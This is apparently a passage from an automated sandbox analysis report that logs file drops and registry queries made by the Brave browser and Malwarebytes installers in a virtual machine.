| File created | C:\Windows\System32\DriverStore\FileRepository\netvchannel.inf_amd64_ba3e73aa330c95d6\netvchannel.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netrtwlane01.inf_amd64_b02695ef070d7a42\netrtwlane01.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\net7500-x64-n650f.inf_amd64_cc87c915f33d1c27\net7500-x64-n650f.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\nete1e3e.inf_amd64_895623810c19146a\nete1e3e.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\net44amd.inf_amd64_450d4b1e35cc8e0d\net44amd.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netefe3e.inf_amd64_7830581a689ef40d\netefe3e.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netsstpa.inf_amd64_e76c5387d67e3fd6\netsstpa.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\rtux64w10.inf_amd64_d6132e4c7fe2fac6\rtux64w10.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{b465ca56-db62-a642-96d5-bfb70e17c0a6}\SET1A4C.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\kernel32.pdb | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Malwarebytes\Logs\MBAMSI.alt1.lock | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netl160a.inf_amd64_e4cbe375963a69e9\netl160a.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netbc64.inf_amd64_b96cdf411c43c00c\netbc64.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_6E4F36431D86962EFD432400DF65AC90 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netelx.inf_amd64_7812e4e45c4a5eb1\netelx.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netr28x.inf_amd64_5d63c7bcbf29107f\netr28x.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\ipoib6x.inf_amd64_ef71073a5867971f\ipoib6x.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netr28ux.inf_amd64_d5996f2a9d9aa9e3\netr28ux.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\kdnic.inf_amd64_6649425cdcae9b5f\kdnic.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\usbncm.inf_amd64_9957a38c3d2283ed\usbncm.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\System32\wbemcore.pdb | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\117308CCCD9C93758827D7CC85BB135E | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\nete1g3e.inf_amd64_af58b4e19562a3f9\nete1g3e.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netrtwlane_13.inf_amd64_992f4f46e65f30d4\netrtwlane_13.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\net8187bv64.inf_amd64_bc859d32f3e2f0d5\net8187bv64.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netk57a.inf_amd64_d823e3edc27ae17c\netk57a.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{b465ca56-db62-a642-96d5-bfb70e17c0a6}\mbtun.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\Amsi.pdb | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\ykinx64.inf_amd64_0bbd8466b526ef26\ykinx64.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netwsw00.inf_amd64_24d55504ae3587aa\netwsw00.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netathr10x.inf_amd64_2691c4f95b80eb3b\netathr10x.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_6E4F36431D86962EFD432400DF65AC90 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netmyk64.inf_amd64_1f949c30555f4111\netmyk64.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\rndiscmp.inf_amd64_81bff1eb756435c6\rndiscmp.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netbc63a.inf_amd64_7ba6c9cea77dd549\netbc63a.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netwns64.inf_amd64_162bb49f925c6463\netwns64.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\wceisvista.inf_amd64_07ad61d07466a58a\wceisvista.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netg664.inf_amd64_84cd7b2798e0a666\netg664.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\net8187se64.inf_amd64_99a4ca261f585f17\net8187se64.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\c_net.inf_amd64_32a9ad23c1ecc42d\c_net.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netvwwanmp.inf_amd64_f9e30429669d7fff\netvwwanmp.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{b465ca56-db62-a642-96d5-bfb70e17c0a6}\SET1A4D.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\fastprox.pdb | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\net819xp.inf_amd64_ff7a5dd4f9b1ceba\net819xp.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netwbw02.inf_amd64_1c4077fa004e73b4\netwbw02.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netwlv64.inf_amd64_0b9818131664d91e\netwlv64.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netrtwlanu.inf_amd64_1815bafd14dc59f0\netrtwlanu.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\bcmwdidhdpcie.inf_amd64_977dcc915465b0e9\bcmwdidhdpcie.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{b465ca56-db62-a642-96d5-bfb70e17c0a6}\SET1A4B.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\ndisimplatformmp.inf_amd64_8de1181bfd1f1628\ndisimplatformmp.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netrtwlans.inf_amd64_97cd1a72c2a7829c\netrtwlans.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netjme.inf_amd64_752bf22f1598bb7e\netjme.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{b465ca56-db62-a642-96d5-bfb70e17c0a6}\SET1A4B.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\mbtun.inf_amd64_add82795013a7c3b\mbtun.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\usbnet.inf_amd64_9e6bb7a4b7338267\usbnet.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netbxnda.inf_amd64_1fff3bc87a99b0f1\netbxnda.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\mbtun.inf_amd64_add82795013a7c3b\mbtun.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\572BF21E454637C9F000BE1AF9B1E1A9 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netnvm64.inf_amd64_35bbbe80dec15683\netnvm64.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netvwifimp.inf_amd64_ec11d0ad3c5b262a\netvwifimp.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\117308CCCD9C93758827D7CC85BB135E | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FA0E447C3E79584EC91182C66BBD2DB7 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\BraveSoftware\Temp\GUMDD4C.tmp\goopdateres_uk.dll | C:\Users\Admin\Downloads\BraveBrowserSetup-BRV010.exe | N/A |
| File created | C:\Program Files (x86)\BraveSoftware\Temp\GUMDD4C.tmp\goopdateres_pt-PT.dll | C:\Users\Admin\Downloads\BraveBrowserSetup-BRV010.exe | N/A |
| File created | C:\Program Files\BraveSoftware\Brave-Browser\Temp\source536_1189550129\Chrome-bin\125.1.66.118\Locales\ta.pak | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2212_606809565\metadata.pb | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| File created | C:\Program Files\BraveSoftware\Brave-Browser\Temp\source536_1189550129\Chrome-bin\125.1.66.118\Locales\de.pak | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\Microsoft.NETCore.App.runtimeconfig.json | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Threading.Overlapped.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\ja\System.Windows.Controls.Ribbon.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveCrashHandlerArm64.exe | C:\Program Files (x86)\BraveSoftware\Temp\GUMDD4C.tmp\BraveUpdate.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\System.Configuration.ConfigurationManager.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\mbae64.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\mbtun\mbtun.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2212_1036432886\StudentNTP_Luke-Berrigan_x1280.jpg | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.IO.IsolatedStorage.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Linq.Parallel.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\pl\PresentationUI.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2212_966325963\list_catalog.json | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2212_919282864\hyph-cs.hyb | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| File created | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\expapply64.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2212_919282864\hyph-et.hyb | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2212_1036432886\StudentNTP_Ben-McCarty_x1280.jpg | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\api-ms-win-core-string-l1-1-0.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\de\UIAutomationProvider.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnel_wireguard.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2212_1632659101\1\scripts\brave_rewards\publisher\vimeo\vimeoBase.bundle.js | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| File created | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdate.exe | C:\Program Files (x86)\BraveSoftware\Temp\GUMDD4C.tmp\BraveUpdate.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Runtime.Serialization.Xml.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\ja\WindowsFormsIntegration.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files (x86)\BraveSoftware\Temp\GUMDD4C.tmp\goopdateres_sr.dll | C:\Users\Admin\Downloads\BraveBrowserSetup-BRV010.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\api-ms-win-core-handle-l1-1-0.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\api-ms-win-core-processenvironment-l1-1-0.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\BraveSoftware\Brave-Browser\Temp\source536_1189550129\Chrome-bin\125.1.66.118\BraveVpnWireguardService\wireguard.dll | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
| File created | C:\Program Files\chrome_url_fetcher_2212_1713553084\jflookgnkcckhobaglndicnbbgbonegd_3030_all_gxlhecuj7wt4iru2mmpk5afmoq.crx3 | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2212_919282864\hyph-de-ch-1901.hyb | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Diagnostics.TextWriterTraceListener.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\System.Diagnostics.EventLog.Messages.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\VPNControllerImpl.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2212_1045159697\_metadata\verified_contents.json | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| File created | C:\Program Files\BraveSoftware\Brave-Browser\Application\SetupMetrics\93bc0d1f-9dfc-42ea-a655-460410a108ca.tmp | C:\Program Files\BraveSoftware\Brave-Browser\Application\125.1.66.118\Installer\chrmstp.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2212_919282864\hyph-da.hyb | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\SecurityProductInformation.ini | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2212_1632659101\1\scripts\brave_rewards\publisher\github\githubAutoContribution.bundle.js | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\Microsoft.CSharp.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Threading.Tasks.Dataflow.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\ru\PresentationCore.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\Microsoft.Extensions.DependencyInjection.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\goopdateres_en-GB.dll | C:\Program Files (x86)\BraveSoftware\Temp\GUMDD4C.tmp\BraveUpdate.exe | N/A |
| File opened for modification | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\gui2E7B.tmp | C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\api-ms-win-core-datetime-l1-1-0.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Xml.Linq.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\ja\System.Windows.Forms.Design.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\PresentationFramework.Luna.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\goopdateres_hi.dll | C:\Program Files (x86)\BraveSoftware\Temp\GUMDD4C.tmp\BraveUpdate.exe | N/A |
| File created | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\goopdateres_lv.dll | C:\Program Files (x86)\BraveSoftware\Temp\GUMDD4C.tmp\BraveUpdate.exe | N/A |
| File created | C:\Program Files\BraveSoftware\Brave-Browser\Temp\source536_1189550129\Chrome-bin\125.1.66.118\Locales\es-419.pak | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
| File created | C:\Program Files\BraveSoftware\Brave-Browser\Temp\source536_1189550129\Chrome-bin\125.1.66.118\resources\brave_extension\_locales\th\messages.json | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
| File created | C:\Program Files\BraveSoftware\Brave-Browser\Application\125.1.66.118\Installer\chrmstp.exe | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2212_919282864\hyph-ru.hyb | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\UIAutomationClient.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files (x86)\BraveSoftware\Temp\GUMDD4C.tmp\goopdateres_ms.dll | C:\Users\Admin\Downloads\BraveBrowserSetup-BRV010.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2212_1036432886\nadeem-choudhary-1.jpg | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\cs\System.Xaml.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\SPControllerImpl.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File opened for modification | C:\Program Files\BraveSoftware\Brave-Browser\Application\SetupMetrics\5428_13361992907330456.pma | C:\Program Files\BraveSoftware\Brave-Browser\Application\125.1.66.118\Installer\chrmstp.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\inf\oem3.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\inf\oem3.inf | C:\Windows\system32\DrvInst.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Windows\system32\svchost.exe | N/A |
